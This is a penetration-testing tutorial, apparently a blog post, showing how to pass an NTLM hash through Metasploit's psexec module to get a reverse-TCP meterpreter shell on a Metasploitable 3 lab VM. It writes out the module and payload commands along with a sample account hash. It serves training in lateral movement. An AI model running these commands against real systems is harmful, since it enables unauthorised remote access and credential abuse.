Get a meterpreter shell with PSExec

Let's assume you already got some low-privilege foothold in a network and obtained a working higher-privileged username and (hashed) password via spear-phishing or creating a new account via exploiting an unquoted service path. I'll explain this blog post how you can obtain a meterpreter shell with these credentials. This is also called lateral movement during a peneteration test. Our target machine is the Metasploitable 3 Windows Server 2008 VM.

PSExec

We are going to use the Metasploit PSExec, which has a few advantages against the Sysinternal's version of PSexec such as modifying the default location of targetted share.

By default, the module takes the following actions:

Creates a randomly-named service executable with an embedded payload

Connects to the hidden ADMIN$ share on the remote system via SMB

Drops malicious service executable onto the share

Utilizes the SCM to start a randomly-named service

Service loads the malicious code into memory and executes it

Metasploit payload handler receives payload and establishes session

Module cleans up after itself, stopping the service and deleting the executable

Step 1: get credential

As said, we assume we already have a credential via another method (spear phishing, hashdump, unquoted service path,..). In this case, we already have a hash dump from all accounts and their hashed passwords. I specifically chose this example because I want to demonstrate that you do not need to crack the NTLM hashed password first. You can simply pass the hash !

In this case, the username we are going to use is vagrant and our hashed password is aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b.

Configure exploit

Note: to get detailed information on loading metasploit modules and meterpreter, check out our Metasploit walkthrough

First, load the exploit with the following command:

use exploit/windows/smb/psexec

Set meterpreter as payload:

set payload windows/meterpreter/reverse_tcp

Next, set LHOST to your Kali IP adress RHOST to the IP of the victim machine. As we know the account is a local account, set SMBSHARE to C$ by entering the command:

set SHARE C$

All we need to do is add our username and password. Note that we just use our NTLM hash we received via the hashdump. No need to crack the password first!

set SMBUSER vagrant

set SMBPASS aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b